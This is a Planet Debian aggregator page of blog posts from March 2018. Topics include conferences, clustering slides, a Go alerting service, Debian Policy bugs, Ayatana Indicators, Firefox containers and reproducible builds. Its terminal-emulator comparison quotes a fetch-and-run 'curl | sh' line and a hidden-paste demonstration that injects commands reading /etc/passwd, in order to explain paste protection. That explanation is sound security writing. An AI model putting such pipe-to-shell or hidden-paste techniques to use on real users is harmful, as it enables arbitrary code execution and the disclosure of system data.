
Planet Debian


three conferences one week

Sat, 31/03/2018 - 3:52am

Thought I'd pack my entire year's conference schedule into one week...

First was a Neuroinformatics infrastructure interoperability workshop at McGill, my second trip to Montreal this year. Well outside my wheelhouse, but there's a fair amount of interest in that community in git-annex/datalad. This was a roll-with-the-acronyms, try-to-draw-parallels-to-things-I-know affair. Also excellent sushi and a bonus Secure Scuttlebutt meetup.

Then LibrePlanet. A unique and super special conference that utterly flew by this year. This is my sixth LibrePlanet and I enjoy it more each time. Highlights for me were Bassam's photogrammetry workshop, Karen receiving the Free Software award, and Seth's thought-provoking talk on "incompossibilities", especially as applied to social networks. And some epic dinner conversations in Central Square.

Finally today, a one-day local(!) functional programming(!!) conference in Knoxville TN. Lambda Squared was the best-constructed single-track conference I've seen. It started with an ex-pro figure skater getting the whole audience to pirouette, to capture that uncomfortable out-of-your-element feeling you get learning FP, and ramped gradually past "functional javascript" to orthogonality, contravariant functors, the lambda cube, and constructivist logic.

I notice that I've spent a lot more time in Boston than I ever have in Knoxville -- Cambridge MA is starting to feel like my old haunts, though I've never really lived there. There are not a lot of functional programming conferences in the southeastern USA, and I think this explains how Lambda Squared attracted such a good lineup of speakers. Also, Knoxville has a surprisingly large and lively FP community shaping up. There will be another Lambda Squared next year, and that might be a good opportunity to visit me and go to an FP conference too.

And now time to retreat into my retreaty place for a good long while.

Joey Hess http://joeyh.name/blog/ see shy jo

Cluster analysis lecture notes

Fri, 30/03/2018 - 5:33pm

In Winter Term 2017/2018 I was a substitute professor at Heidelberg University, giving the lecture “Knowledge Discovery in Databases”, i.e., the data mining lecture.

While I won’t make all my slides available, I decided to make the chapter on cluster analysis available, largely because there do not appear to be good current books on this topic. Many of the books on data mining barely cover the basics, and I am constantly surprised to see how little people know beyond k-means. But clustering is much broader than k-means!

As I hope to give this lecture regularly at some point, I appreciate feedback to improve the slides further. This year I almost completely reworked them, so there are a lot of things to fine-tune.

There exist three versions of the slides:

These slides took me about 9 sessions of 90 minutes each.
On one hand, I was not very fast this year, and I probably need to cut down on the extra blackboard material, too. Next time, I will try to use at most 8 sessions, to be able to cover other important topics, such as outlier detection, in more detail; those got a bit too little time this year.

I hope the slides will be interesting and useful, and I would appreciate it if you gave me credit, e.g., by citing my work appropriately.

Erich Schubert https://www.vitavonni.de/blog/ Techblogging

My Laptop

Fri, 30/03/2018 - 10:32am

My laptop is an old used Samsung R439 that I bought for around Rs 12000/- (USD 185) from a local store when I was in my second year of college. It has a 14” screen, 2GB of RAM, a Pentium p1600 processor, and a 320GB HDD.

Recently it started showing performance issues: applications take a while to load and Firefox freezes. I'm quite fond of this laptop and have some emotional attachment to it. I was reluctant to buy a new one, but at the same time I need the VT-x (virtualization) feature that my Pentium p1600 lacks. So I chose to upgrade it from the ground up. The hard part of upgrading was finding a compatible processor for the board. My friend Akhil Varkey, whom I met during a Debian packaging session, helped me find a processor that suits my board. I bought the suggested one from AliExpress, because I found it cheaply available there. I disassembled the laptop and installed the new processor myself. During disassembly I totally destroyed (stripped) two screws, including their holes :(. Now I need to be more careful when carrying the laptop around. I had already changed my laptop battery and keyboard a couple of months after I bought it. I will be upgrading the RAM and hard disk soon.

Abhijith PA http://abhijithpa.me/ Abhijith PA

Rewriting some services in golang

Fri, 30/03/2018 - 9:00am

The past couple of days I've been reworking a few of my existing projects, and converting them from Perl into Golang.

Bytemark had a great alerting system for routing alerts to different engineers, via email, SMS, and chat-messages. The system is called mauvealert and is available here on github.

The system is built around the notion of alerts which have different states (such as "pending", "raised", or "acknowledged"). Each alert is submitted via a UDP packet sent to the server with a bunch of fields:

  • Source IP of the submitter (this is implicit).
  • A human-readable ID such as "heartbeat", "disk-space-/", "disk-space-/root", etc.
  • A raise-field.
  • More fields here ..

Each incoming submission is stored in a database, and events are considered unique based upon the source+ID pair, such that if you see a second submission from the same IP, with the same ID, then any existing details are updated. This update-on-receive behaviour is pretty crucial to the way things work, especially when coupled with the "raise"-field.

A raise field might have values such as:

  • +5m
    • This alert will be raised in 5 minutes.
  • now
    • This alert will be raised immediately.
  • clear
    • This alert will be cleared immediately.

One simple way the system is used is to maintain heartbeat-alerts. Imagine a system sends the following message, every minute:

  • id:heartbeat raise:+5m [source:1.2.3.4]
    • The first time this is received by the server it will be recorded in the database.
    • The next time this is received the existing event will be updated, and crucially the time to raise an alert will be bumped (i.e. it will become current-time + 5m).
    • The next time the update is received the raise-time will also be bumped
    • ..

At some point the submitting system crashes, and five minutes after the last submission the alert moves from "pending" to "raised" - which will make it visible in the web-based user-interface, and also notify an engineer.
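To make those raise-field semantics concrete, here is a small illustrative sketch in Python (not the actual mauvealert code, just a toy model of the behaviour described above), keyed on the source+ID pair:

# Illustrative sketch only -- not mauvealert's real implementation.
# Each (source, id) pair maps to a single alert whose raise-time is
# recomputed on every submission, which is what keeps heartbeats pending.
import time

alerts = {}  # (source_ip, alert_id) -> {"state": ..., "raise_at": ...}

def handle_submission(source_ip, alert_id, raise_field):
    now = time.time()
    if raise_field == "clear":
        state, raise_at = "cleared", None
    elif raise_field == "now":
        state, raise_at = "raised", now
    elif raise_field.startswith("+") and raise_field.endswith("m"):
        state, raise_at = "pending", now + 60 * int(raise_field[1:-1])
    else:
        raise ValueError("unknown raise field: %r" % raise_field)
    # update-on-receive: a repeat submission replaces any existing details
    alerts[(source_ip, alert_id)] = {"state": state, "raise_at": raise_at}

def raise_due_alerts():
    # run periodically: anything whose raise-time has passed becomes "raised"
    now = time.time()
    for alert in alerts.values():
        if alert["state"] == "pending" and alert["raise_at"] <= now:
            alert["state"] = "raised"

handle_submission("1.2.3.4", "heartbeat", "+5m")  # stays pending while bumped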

With this system you can easily write trivial, stateless ad-hoc monitoring scripts which raise or clear an alert, like so:

curl https://example.com && \
  send-alert --id http-example.com --raise clear --detail "site ok" || \
  send-alert --id http-example.com --raise now --detail "site down"

In short, mauvealert allows aggregation of events and centralises how/when engineers are notified. There's the flexibility to look at events and send them to different people at different times of the day, to decide some are urgent and must trigger SMSs, and that some are ignorable and just generate emails.

(In mauvealert this routing is done via a configuration file containing Ruby which attempts to match events, so you can do things like say "if the event-id contains 'failed-disc' then notify a DC-person, or if the event was raised from $important-system then notify everybody".)

I thought the design was pretty cool, and wanted something similar for myself. My version, which I set up a couple of years ago, was based around HTTP+JSON rather than UDP messages, and written in Perl:

The advantage of using HTTP+JSON is that writing clients to submit events to the central system could easily and cheaply be done in multiple environments for multiple platforms. I didn't see the need for the efficiency of using binary UDP-based messages for submission, given that I have ~20 servers at the most.
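As a rough illustration of why HTTP+JSON clients are cheap to write, here is a hypothetical submission in Python; the URL, port, and field names below are invented for the example and are not the project's actual API:

# Hypothetical example only: the endpoint and field names are made up.
import requests

requests.post("http://alerts.example.com:8080/events", json={
    "id": "disk-space-/",
    "raise": "+5m",
    "detail": "disk usage above 90%",
}, timeout=5)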

Anyway the point of this blog post is that I've now rewritten my simplified personal-clone as a golang project, which makes deployment much simpler. Events are stored in an SQLite database and when raised they get sent to me via pushover:

The main difference is that I don't allow you to route events to different people, or notify via different mechanisms. Every raised alert gets sent to me, and only me, regardless of time of day. (Albeit via a pluggable external process such that you could add your own local logic.)

I've written too much already, getting sidetracked by explaining how neat mauvealert (and by extension purple) was, but I also rewrote the Perl DNS-lookup service at https://dns-api.org/ in golang too:

That had a couple of regressions which were soon reported and fixed by a kind contributor (lack of CORS headers, most obviously).

Steve Kemp https://blog.steve.fi/ Steve Kemp's Blog

Debian Policy call for participation -- March 2018

Fri, 30/03/2018 - 2:23am

We’re getting close to a new release of Policy. Just this week Adam Borowski stepped up to get a patch written for #881431 – thanks for getting things moving along!

Please consider jumping into some of these bugs.

Consensus has been reached and help is needed to write a patch

#823256 Update maintscript arguments with dpkg >= 1.18.5

#833401 virtual packages: dbus-session-bus, dbus-default-session-bus

#835451 Building as root should be discouraged

#838777 Policy 11.8.4 for x-window-manager needs update for freedesktop menus

#845715 Please document that packages are not allowed to write outside thei…

#853779 Clarify requirements about update-rc.d and invoke-rc.d usage in mai…

#874019 Note that the '-e' argument to x-terminal-emulator works like '--'

#874206 allow a trailing comma in package relationship fields

Wording proposed, awaiting review from anyone and/or seconds by DDs

#756835 Extension of the syntax of the Packages-List field.

#786470 [copyright-format] Add an optional “License-Grant” field

#835451 Building as root should be discouraged

#845255 Include best practices for packaging database applications

#846970 Proposal for a Build-Indep-Architecture: control file field

#864615 please update version of posix standard for scripts (section 10.4)

#881431 Clarify a version number is unique field

#892142 update example to use default-mta instead of exim

Merged for the next release (no action needed)

#299007 Transitioning perms of /usr/local

#515856 remove get-orig-source

#742364 Document debian/missing-sources

#886890 Fix for found typos

#888437 Several example scripts are not valid.

#889960 stray line break at clean target in section 4.9

#892142 update example to use default-mta instead of exim

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

A look at terminal emulators, part 1

Fri, 30/03/2018 - 2:00am

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride in using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal         Debian          Fedora    Upstream  Notes
Alacritty        N/A             N/A       6debc4f   no releases, Git head
GNOME Terminal   3.22.2          3.26.2    3.28.0    uses GTK3, VTE
Konsole          16.12.0         17.12.2   17.12.3   uses KDE libraries
mlterm           3.5.0           3.7.0     3.8.5     uses VTE, "Multi-lingual terminal"
pterm            0.67            0.70      0.70      PuTTY without ssh, uses GTK2
st               0.6             0.7       0.8.1     "simple terminal"
Terminator       1.90+bzr-1705   1.91      1.91      uses GTK3, VTE
urxvt            9.22            9.22      9.22      main rxvt fork, also known as rxvt-unicode
Xfce Terminal    0.8.3           0.8.7     0.8.7.2   uses GTK3, VTE
xterm            327             330       331       the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia, has had "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fall back across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command:

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello "; whoami|tr -d '\n'; echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
Here'"'"'s the first line of your /etc/passwd: '; head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on
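To see what bracketed paste actually does on the wire, here is a small illustrative Python sketch; the \x1b[?2004h and \x1b[200~ / \x1b[201~ sequences are the ones documented for xterm, and support varies by terminal:

# Illustrative sketch: enable bracketed-paste reporting, read raw input,
# and show how pasted text arrives wrapped in ESC[200~ ... ESC[201~.
import os, sys, termios, tty

fd = sys.stdin.fileno()
saved = termios.tcgetattr(fd)
sys.stdout.write("\x1b[?2004h")       # ask the terminal to bracket pastes
sys.stdout.flush()
try:
    tty.setcbreak(fd)
    print("paste something now:")
    data = os.read(fd, 65536)         # a paste usually arrives in one read
    print(repr(data))                 # look for the 200~ / 201~ markers
finally:
    termios.tcsetattr(fd, termios.TCSADRAIN, saved)
    sys.stdout.write("\x1b[?2004l")   # switch bracketed-paste reporting off
    sys.stdout.flush()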

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch away to another tiling terminal, Tilix. I am personally happy with only an Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems, however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.
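For reference, such a setup only needs a handful of lines; a minimal sketch of an ~/.Xresources fragment for urxvt (the colour values shown are illustrative rather than the complete Solarized palette):

URxvt.background: #002b36
URxvt.foreground: #839496
URxvt.color0:     #073642
URxvt.color1:     #dc322f
URxvt.color2:     #859900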

While the original VT100 terminal did not support colors, newer terminals usually did, but were often limited to a 256-color palette. For power users styling their terminals, shell prompts, or status bars in more elaborate ways, this can be a frustrating limitation. A Gist keeps track of which terminals have "true color" support. My tests also confirm that st, Alacritty, and the VTE-derived terminals I tested have excellent true color support. Other terminals, however, do not fare so well and actually fail to display even 256 colors. You can see below the difference between true color support in GNOME Terminal, st, and xterm, which still does a decent job at approximating the colors using its 256-color palette. Urxvt not only fails the test but even shows blinking characters instead of colors.
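A quick way to test this yourself is the usual 24-bit color escape check; a minimal sketch in Python using the xterm-style 38;2/48;2 SGR sequences (terminals without true color will approximate or ignore them):

# Print a smooth colour gradient; visible banding or garbage output
# means the terminal is not honouring 24-bit colour sequences.
for r in range(0, 256, 4):
    print(f"\x1b[48;2;{r};{255 - r};0m \x1b[0m", end="")
print()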

Some terminals also parse the text for URL patterns to make them clickable. This is the case for all VTE-derived terminals, while urxvt requires the matcher plugin to visit URLs through a mouse click or keyboard shortcut. Other terminals reviewed do not display URLs in any special way.

Finally, a new trend treats scrollback buffers as an optional feature. For example, st has no scrollback buffer at all, pointing people toward terminal multiplexers like tmux and GNU Screen in its FAQ. Alacritty also lacks scrollback buffers but will add support soon because there was "so much pushback on the scrollback support". Apart from those outliers, every terminal I could find supports scrollback buffers.

Preliminary conclusions

In the next article, we'll compare performance characteristics like memory usage, speed, and latency of the terminals. But we can already see that some terminals have serious drawbacks. For example, users dealing with RTL scripts on a regular basis may be interested in mlterm and pterm, as they seem to have better support for those scripts. Konsole gets away with a good score here as well. Users who do not normally work with RTL scripts will also be happy with the other terminal choices.

In terms of paste protection, urxvt stands alone above the rest with its special feature, which I find particularly convenient. Those looking for all the bells and whistles will probably head toward terminals like Konsole. Finally, it should be noted that the VTE library provides an excellent basis for terminals to provide true color support, URL detection, and so on. So at first glance, the default terminal provided by your favorite desktop environment might just fit the bill, but we'll reserve judgment until our look at performance in the next article.

This article first appeared in the Linux Weekly News.

Antoine Beaupré https://anarc.at/tag/debian-planet/ pages tagged debian-planet

The subjectification of a racial group

Fri, 30/03/2018 - 12:13am

In the philosophy department the other day we were discussing race-based sexual preferences. As well as considering the cases in which this is ethically problematic, we were trying to determine cases in which it might be okay.

A colleague suggested that a preference with the following history would not be problematic. There is a culture with which he feels a strong affiliation, having spent time living in this culture and having a keen interest in various aspects of that culture, such as its food. As a result, he is more likely, on average, to find himself sexually attracted to someone from that culture—he shares something with them. And since almost all members of that culture are of a particular racial group, that means he is more likely to find himself sexually attracted to someone of that race than to other races, ceteris paribus.

The cultural affiliation is something good. The sexual preference is then an ethically neutral side effect of that affiliation. My colleague suggested a name for the process which is responsible for the preference: he has subjectified his relationship with the culture. Instead of objectifying members of that group, as happens with problematic race-based sexual preferences, he has done something which counts as the opposite.

I am interested in thinking more about the idea of subjectification.

Sean Whitton https://spwhitton.name//blog/ Notes from the Library

Starting the Ayatana Indicators Transition in Debian

Thu, 29/03/2018 - 3:03pm

This is to make people aware of, and to inform about, an ongoing effort to replace Indicators in Debian (most people know the concept from Ubuntu) with a more generically developed and actively maintained fork: Ayatana Indicators.

TL;DR:

In Debian, we will soon start sending out patches to SNI-supporting applications via Debian's BTS (and upstream trackers, too, probably) that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator.

Status of the work being done is documented here: https://wiki.debian.org/Ayatana/IndicatorsTransition

Why Ayatana Indicators

The fork is currently pushed forward by the Debian and Ubuntu MATE packaging team.

The Indicators concept was originally documented by Canonical; find your entry point in the readings here [1,2].

Some great work and achievements were done around Ubuntu Indicators by Canonical Ltd., and the Indicators concept has always been a special identifying feature of Ubuntu. Now, with the switch to GNOME 3, the future of Indicators in Ubuntu is uncertain. This is where Ayatana Indicators come in...

The main problem with Ubuntu Indicators today (and ever since) has been that they only work properly on Ubuntu, mostly because of one Ubuntu-specific patch against GTK-3 [3].

In Ayatana Indicators (speaking with my upstream hat on now), we are currently working on a re-implementation of the rendering part of the indicators (using GTK's popovers rather than menu shells), so that it works on vanilla GTK-3. Help from GTK-3 developers is highly welcome, in case you feel like chiming in.

Furthermore, the various indicator icons in Ubuntu (-session, -power, -sound, etc. - see below for more info) have been targeted more and more at sole usage with the Unity 7 and 8 desktop environments. They can be used with other desktop environments, but are likely to behave quite agnostically (and sometimes stupidly) there.

In Ayatana Indicators, we are working on generalizing the functionality of those indicator icon applications and making them more gnostic on other desktop environments.

Ayatana Indicators as an upstream project will be very open to contributions from other desktop environment developers who want to utilize the indicator icons with their desktop shell but need adaptations for their environment. Furthermore, we want to encourage Unity 7 and Unity 8 developers to consider switching over (and getting one step further towards the goal of shipping Unity on non-Ubuntu systems). First discussion exchanges have already taken place with the Unity 8 maintainers (the people from UBports / Ubuntu Touch).

The different Components of Ayatana Indicators

The 'indicator-renderer' Applets

These are mostly panel plugins that render the system tray icons and menus (and widgets) defined by indicator-aware applications. They normally come with your desktop environment (if it supports indicators).

Letting the desktop environment render the system tray itself assures that the indicator icons (i.e. the desktop system tray) look just like the rest of the desktop shell. With the classical (xembed-based) system tray (or notification) areas, all applications render their icon and menus themselves, which can cause theming problems, a11y issues, and more.

Examples of indicator renderers are: mate-indicator-applet, budgie-indicator-applet, xfce4-indicator-plugin, etc.

Shared Library: Rendering and Loading of Indicators

The Ayatana Indicators project currently only provides a rendering shared lib for GTK-2 and GTK-3 based applications. We still need to connect better with the Qt-world.

The rendering library (used by the above renderers) is libayatana-indicator.

This library supports:

  • loading and rendering of old style indicators
  • loading and rendering of NG indicators

The libayatana-indicator library also utilizes a variety of versatile GTK-3 widgets defined in another shared library: ayatana-ido.

Ayatana Indicator Applets

The Ayatana Indicators project continues and generalizes various indicator icon applications that are not applications by themselves really, but more like system / desktop control elements:

  • ayatana-indicator-session (logout, lock screen, user guides, etc.)
  • ayatana-indicator-power (power management)
  • ayatana-indicator-sound (sound and multimedia control)
  • ayatana-indicator-datetime (clock, calendar, evolution-data-server integration)
  • ayatana-indicator-notifications (libnotify collector of system messages)
  • ayatana-indicator-printers (interact with CUPS print jobs and queues)

These indicators are currently under heavy re-development. The current effort in Ayatana Indicators is to make them far more generic and usable on all desktop environments that want to support them. E.g. we recently added XFCE awareness to the -session and the -power indicator icons.

One special indicator icon is the Ayatana Indicator Application indicator. It provides SNI support to third-party applications (see below). For the desktop applet, it appears just like any of the other above named indicators, but it opens the door to the world of SNI supporting applications.

One available and easy-to-install test case in Debian buster for indicator icons provided by the Ayatana Indicators project is the arctica-greeter package. The icons displayed in the greeter are Ayatana Indicators.

Ayatana AppIndicator API

The Ayatana AppIndicator API is just one way of talking to an SNI DBus service. The implementation is done in the shared lib 'libayatana-appindicator'. This library provides an easy to implement API that allows GTK-2/3 applications to create an indicator icon in a panel with an indicator renderer added.

In the application, the developer creates a generic menu structure and defines one or more icons for the system tray (with more than one icon, only one icon is shown (plus some text, if needed), but that icon may change based on the applet's status). This generic menu is sent to a DBus interface (org.kde.StatusNotifier). Sometimes people say that such applications have SNI support (StatusNotifier Interface support).

The Ayatana Indicators project offers Ayatana AppIndicator to GTK-3 developers (and GTK-2, but well...). Canonical implemented bindings for Python2, Perl, GIR, Mono/CLI and we continue to support these as long as it makes sense.
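As a rough sketch of what this looks like from an application's point of view, here is a minimal Python/GIR example. The namespace string is an assumption based on the Ayatana packaging (the classic Ubuntu library uses AppIndicator3 instead), so adjust it to whatever your distribution actually ships:

# Minimal sketch (namespace assumed, see above): create one indicator icon
# with a generic menu; the SNI service and renderer applet do the drawing.
import gi
gi.require_version("Gtk", "3.0")
gi.require_version("AyatanaAppIndicator3", "0.1")   # assumed namespace
from gi.repository import Gtk, AyatanaAppIndicator3 as AppIndicator

indicator = AppIndicator.Indicator.new(
    "example-indicator",                            # application id
    "dialog-information",                           # themed icon name
    AppIndicator.IndicatorCategory.APPLICATION_STATUS)
indicator.set_status(AppIndicator.IndicatorStatus.ACTIVE)

menu = Gtk.Menu()                                   # the generic menu structure
quit_item = Gtk.MenuItem(label="Quit")
quit_item.connect("activate", Gtk.main_quit)
menu.append(quit_item)
menu.show_all()
indicator.set_menu(menu)

Gtk.main()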

The nice part of the Ayatana AppIndicator shared library is that if a desktop shell does not offer the SNI service, it tries to fall back to the xembed way of adding system tray icons to your panel / status bar.

In Debian, we will soon start sending out patches to SNI-supporting applications that make the shift from Ubuntu AppIndicator (badly maintained in Debian) to Ayatana AppIndicator. The cool part of this is that you can convert your GTK-3 application from Ubuntu AppIndicator to Ayatana AppIndicator and use it on top of any(!) SNI implementation, be it an applet based on Ubuntu Indicators, one based on Ayatana Indicators, or some other implementation like the vala-sntray-applet or the SNI support in KDE.

Further Readings

Some more URLs for deeper reading...

You can also find more info on my blog: https://sunweavers.net

sunweaver http://sunweavers.net/blog/blog/1 sunweaver's blog

food, consumer experience and Joshi Wadewala

Thu, 29/03/2018 - 9:29am

For a while now, I have been looking at the various ways food quality is checked by various people. The only proper or official authority is FSSAI, but according to CAG and Quartz's own web report, FSSAI has a long way to go.

The reason I share this is that over the years I have mentioned how Joshi Wadewala has managed to outdo what others could also have done. But lately, it seems the staff and the owners have grown lax and arrogant about the quality of food and service they provide. For instance, under FSSAI it is written under labelling –

Labelling

It is mandatory that every package of food intended for sale should carry a label that bears all the information required under the FSS (Packaging and Labelling) Regulation, 2011. Food packages must carry a label with the following information:

Common name of the Product.
Name and address of the product’s Manufacturer
Date of Manufacture
Ingredient List with additives
Nutrition Facts
Best before/ Expires on
Net contents in terms of weight, measure or count.
Packing codes/Batch number
Declaration regarding vegetarian or non-vegetarian
Country of origin for imported food

Also, many a time their fresh food is either not fresh or not cooked properly. This has been happening for a couple of weeks now. I have to point out that they are not the only ones, although this is a proper shop, not a pavement stall per se.

I did file my concern with FSSAI, but I highly doubt any action will be taken even though it is a public safety and health issue; as the big players are never caught, he is just a smallish-time operator.

It is also a concern as my mother has no teeth, and I was diagnosed with convulsive seizures last year, which prevented me from attending DebConf. I was in hospital for a period of 3 months.

I have stopped going to the establishment, as there are others who are better at receiving feedback and strive to be better.

Disclaimer – All the photos shared are copyright zomato.com

I also have no idea whether GST is paid or not, as you do not get any receipt for your purchases, which is also one of the basic consumer rights. They just have one slip, which you get when you make your purchase and have to hand over either for take-away or for getting food.

They do have a bill book but that is for bulk purchases only.

shirishag75 https://flossexperiences.wordpress.com #planet-debian – Experiences in the community

Limit personal data exposure with Firefox containers

Wed, 28/03/2018 - 8:44pm

There was some noise recently about the massive amount of data gathered by Cambridge Analytica from Facebook users. While I don't use Facebook myself, I do use Google and other services which are known to gather a massive amount of data, and I obviously know a lot of people using those services. I also saw some posts or tweet threads about the data collection those services do.

Mozilla recently released a Firefox extension to help users confine Facebook data collection. This add-on is actually based on the containers technology Mozilla has been developing for a few years. It started as an experimental feature in Nightly, then as a Test Pilot experiment, and finally evolved into a fully featured extension called Multi-Account Containers. A somewhat restricted version of this is even included directly in Firefox, but without the extension you don't get the configuration window and you need to configure it manually with about:config.
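If you want to try the built-in (extension-less) variant, the relevant about:config switches are reportedly these two (names assumed from Mozilla's documentation, so verify against your Firefox version):

privacy.userContext.enabled = true       (turn the containers feature on)
privacy.userContext.ui.enabled = true    (expose the container UI in menus)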

Basically, containers separate storage (cookies, site preferences, login sessions, etc.) and enable a user to isolate various aspects of their online life by staying logged in to specific websites only in their respective containers. In a way it looks like having a separate Firefox profile per website, but it's a lot more usable day to day.

I use this extension massively, in order to isolate each website. I have one container for Google, one for Twitter, one for banking, etc. If I used Facebook, I would have a Facebook container; if I used Gmail, I would have a Gmail container. Then, my day-to-day browsing is done using the “default” container, where I'm not logged in to any website, so tracking is minimal (I also use uBlock Origin to reduce ads and tracking).

That way, my online life is compartmentalized/containerized and Google doesn't always associate my web searches to my account (I actually usually use DuckDuckGo but sometimes I do a Google search), Twitter only knows about the tweets I read and I don't expose all my cookies to every website.

The extension and support pages are really helpful to get started, but basically:

  • you install the extension from the extension page
  • you create new containers for the various websites you want using the menu
  • when you open a new tab you can opt to open it in a selected container by long pressing on the + button
  • the current container is shown in the URL bar and with a color underline on the current tab
  • it's also optionally possible to assign a website to a container (for example, always open facebook.com in the Facebook container), which can help restricting data exposure but might prevent you browsing that site unidentified

When you're inside a container and you want to follow a link, you can get out of the container by right-clicking on the link, selecting “Open link in new container tab”, then selecting “no container”. That way Facebook won't follow you on that website and you'll start fresh (after the redirection).

As far as I can tell it's not yet possible to have disposable containers (which would be trashed after you close the tab) but a feature request is open and another extension seems to exist.

In the end, and while the isolation from that extension is not perfect, I really suggest Firefox users give it a try. In my opinion it's really easy to use and really helps maintain healthy barriers around one's online presence. I don't know of an equivalent system for Chromium (or Safari) users, but if you know about one feel free to point me to it.

A French version of this post is also available here just in case.

Yves-Alexis corsac@debian.org Corsac.net - Debian

Reproducible Builds: Weekly report #152

Tue, 27/03/2018 - 11:33pm

Here's what happened in the Reproducible Builds effort between Sunday March 18 and Saturday March 24 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This week, version 92 was uploaded to unstable by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

reprotest development

reprotest is our tool to build software and check it for reproducibility.

trydiffoscope development

trydiffoscope is a lightweight command-line interface to the try.diffoscope.org web-based version of diffoscope.

Reviews of unreproducible packages

88 package reviews have been added, 109 have been updated and 18 have been removed in this week, adding to our knowledge about identified issues.

A random_order_in_javahelper_manifest_files toolchain issue was added by Chris Lamb and the timestamps_in_pdf_generated_by_inkscape toolchain issue was also updated with a URI to the upstream discussion.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (66)
  • Jeremy Bicha (1)
  • Michael Olbrich (1)
